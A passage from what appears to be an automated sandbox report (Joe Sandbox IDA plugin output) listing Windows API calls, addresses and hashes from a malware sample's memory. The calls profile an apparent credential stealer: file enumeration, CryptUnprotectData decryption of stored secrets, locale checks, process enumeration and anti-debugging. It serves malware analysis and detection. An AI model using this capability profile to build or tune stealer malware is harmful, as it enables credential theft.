                                                    • Part of subcall function 02F1AB87: lstrcat.KERNEL32(00000000), ref: 02F1ABE9
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 02F0DD52
                                                  • StrCmpCA.SHLWAPI(?,004214B4), ref: 02F0DD9A
                                                  • StrCmpCA.SHLWAPI(?,004214B8), ref: 02F0DDB0
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 02F0E033
                                                  • FindClose.KERNEL32(000000FF), ref: 02F0E045
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Similarity
                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                  • String ID:
                                                  • API String ID: 3334442632-0
                                                  • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                                  • Instruction ID: a1cfbb6ece88936813677b122397fa0ef02de56c95fc413733ed1c44865afe27
                                                  • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                                  • Instruction Fuzzy Hash: 71915672A00208DBCB14FBB0DE95DEE777AAF95340F40865CE64A961C0EE349B58CF91
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                                                  • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                                                  • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                                                  • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Similarity
                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                  • String ID:
                                                  • API String ID: 3334442632-0
                                                  • Opcode ID: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                                  • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                                                  • Opcode Fuzzy Hash: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                                  • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                                                  APIs
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                    • Part of subcall function 02F1AB87: lstrcpy.KERNEL32(00000000,?), ref: 02F1ABD9
                                                    • Part of subcall function 02F1AB87: lstrcat.KERNEL32(00000000), ref: 02F1ABE9
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 02F0F985
                                                  • StrCmpCA.SHLWAPI(?,004215BC), ref: 02F0F9D6
                                                  • StrCmpCA.SHLWAPI(?,004215C0), ref: 02F0F9EC
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 02F0FD18
                                                  • FindClose.KERNEL32(000000FF), ref: 02F0FD2A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Similarity
                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                  • String ID:
                                                  • API String ID: 3334442632-0
                                                  • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                                  • Instruction ID: 3dc69c25828c72007e053abf3314ad4f6d82076116469885f21f64d1fd95037c
                                                  • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                                  • Instruction Fuzzy Hash: 43B14271A01218DBCB28FF60DD95FEE777AAF54340F808299960E56190EF319B48CF91
                                                  APIs
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,?,?,004251C4,?,?,00000000,?,00000000), ref: 02F01B8A
                                                  • StrCmpCA.SHLWAPI(?,0042526C), ref: 02F01BDA
                                                  • StrCmpCA.SHLWAPI(?,00425314), ref: 02F01BF0
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 02F01FA7
                                                  • DeleteFileA.KERNEL32(00000000), ref: 02F02031
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 02F02087
                                                  • FindClose.KERNEL32(000000FF), ref: 02F02099
                                                    • Part of subcall function 02F1AB87: lstrcpy.KERNEL32(00000000,?), ref: 02F1ABD9
                                                    • Part of subcall function 02F1AB87: lstrcat.KERNEL32(00000000), ref: 02F1ABE9
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Similarity
                                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                  • String ID:
                                                  • API String ID: 1415058207-0
                                                  • Opcode ID: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                                  • Instruction ID: 9910af548e85a030492fb7a744ed8abad2675968c0d38024cf43fb5b4be897fc
                                                  • Opcode Fuzzy Hash: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                                  • Instruction Fuzzy Hash: A412CB71911258ABCB19FB60DD94EEEB77AAF54780F8041DDA60A620D0EF746F88CF50
                                                  APIs
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 02F0E0C5
                                                  • StrCmpCA.SHLWAPI(?,004214C8), ref: 02F0E115
                                                  • StrCmpCA.SHLWAPI(?,004214CC), ref: 02F0E12B
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 02F0E647
                                                  • FindClose.KERNEL32(000000FF), ref: 02F0E659
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Similarity
                                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                  • String ID:
                                                  • API String ID: 2325840235-0
                                                  • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                                  • Instruction ID: 742dabcaff397876daec866a58cef57269e9d2fca41e6cc03728714f4110420b
                                                  • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                                  • Instruction Fuzzy Hash: 2BF1AB71911218DACB29FB60DD94EEEB73AAF54740FC055DAA24E62090EF346F89CF50
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                                                  • LocalFree.KERNEL32(00000000), ref: 00417D22
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Similarity
                                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                  • String ID: /
                                                  • API String ID: 3090951853-4001269591
                                                  • Opcode ID: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                                  • Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
                                                  • Opcode Fuzzy Hash: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                                  • Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5
                                                  APIs
                                                  • memset.MSVCRT ref: 02F0CABA
                                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 02F0CAD8
                                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 02F0CAE3
                                                  • memcpy.MSVCRT(?,?,?), ref: 02F0CB79
                                                  • lstrcat.KERNEL32(?,00420B46), ref: 02F0CBAA
                                                  • lstrcat.KERNEL32(?,00420B47), ref: 02F0CBBE
                                                  • lstrcat.KERNEL32(?,00420B4E), ref: 02F0CBDF
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Similarity
                                                  • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                  • String ID:
                                                  • API String ID: 1498829745-0
                                                  • Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                                  • Instruction ID: 1881aa186829858df64baedc67b8181fba492faf7328f557dc186829b658e494
                                                  • Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                                  • Instruction Fuzzy Hash: B5415FB9D4421AEFDB10DFD0DC88BEEBBB9BB44344F1045A9E609A6280D7745A84CF91
                                                  APIs
                                                  • memset.MSVCRT ref: 0040C853
                                                  • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,02D45CF0), ref: 0040C871
                                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                                  • memcpy.MSVCRT(?,?,?), ref: 0040C912
                                                  • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                                  • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                                  • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Similarity
                                                  • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                  • String ID:
                                                  • API String ID: 1498829745-0
                                                  • Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                                  • Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
                                                  • Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                                  • Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95
                                                  APIs
                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                  • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Similarity
                                                  • API ID: BinaryCryptLocalString$AllocFree
                                                  • String ID: N@
                                                  • API String ID: 4291131564-4229412743
                                                  • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                  • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                                                  • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                  • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                                                  APIs
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                  • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 02F17E48
                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 02F17E60
                                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 02F17E74
                                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 02F17EC9
                                                  • LocalFree.KERNEL32(00000000), ref: 02F17F89
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Similarity
                                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                  • String ID:
                                                  • API String ID: 3090951853-0
                                                  • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                                  • Instruction ID: 83f928b6c562160e4c200e85e8b1e1102cf0897bc325c12fb426e292c601bbd7
                                                  • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                                  • Instruction Fuzzy Hash: D1414972941218ABCB24EB94DD98BEEB7B5FB44740F5041D9E20AA6190DB346F85CF90
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32 ref: 02F1BE09
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02F1BE1E
                                                  • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 02F1BE29
                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 02F1BE45
                                                  • TerminateProcess.KERNEL32(00000000), ref: 02F1BE4C
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                  • String ID:
                                                  • API String ID: 2579439406-0
                                                  • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                  • Instruction ID: 3535a12d6ab7e443b5051540a61b652b61d1454f9f916859f8b433293967bb9d
                                                  • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                  • Instruction Fuzzy Hash: 4A21A0BC900205DFDB14DF69FC896963BF4FB0A354F50403AE90A872A4EBB05981EF49
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                                                  • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                                                  • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                  • String ID:
                                                  • API String ID: 2579439406-0
                                                  • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                  • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                                                  • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                  • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 02F074B4
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02F074BB
                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02F074E8
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 02F0750B
                                                  • LocalFree.KERNEL32(?), ref: 02F07515
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                  • String ID:
                                                  • API String ID: 2609814428-0
                                                  • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                  • Instruction ID: 021d397f7967de8c7c913fb4ee8e58d3152aa78c91c470f83e72d483d927a1dd
                                                  • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                  • Instruction Fuzzy Hash: 3E010075B80208BBEB10DFD4DD45FAD77B9EB45704F104155F705AA2C0D670AA01CB65
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                  • String ID:
                                                  • API String ID: 3657800372-0
                                                  • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                  • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                                                  • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                  • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02F19885
                                                  • Process32First.KERNEL32(00420ACA,00000128), ref: 02F19899
                                                  • Process32Next.KERNEL32(00420ACA,00000128), ref: 02F198AE
                                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 02F198C3
                                                  • CloseHandle.KERNEL32(00420ACA), ref: 02F198E1
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 420147892-0
                                                  • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                  • Instruction ID: 48ce868b5e382b307159e401e41db72caeb938186b535aaf7cbd78123fa992ff
                                                  • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                  • Instruction Fuzzy Hash: 0A014C79A40208FFCB20DFE4CC54BEDB7F9EB08350F404189A505A6240D7B49A44CF91
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                                                  • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                                                  • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                                                  • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 420147892-0
                                                  • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                  • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                                                  • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                  • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                                                  APIs
                                                  • CryptBinaryToStringA.CRYPT32(00000000,02F053EB,40000001,00000000,00000000,?,02F053EB), ref: 02F19127
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: BinaryCryptString
                                                  • String ID:
                                                  • API String ID: 80407269-0
                                                  • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                  • Instruction ID: f4f1d6175a0ed388f3de1682ad2e5bc99e088a82e486cbfad560a411dcc3bd8d
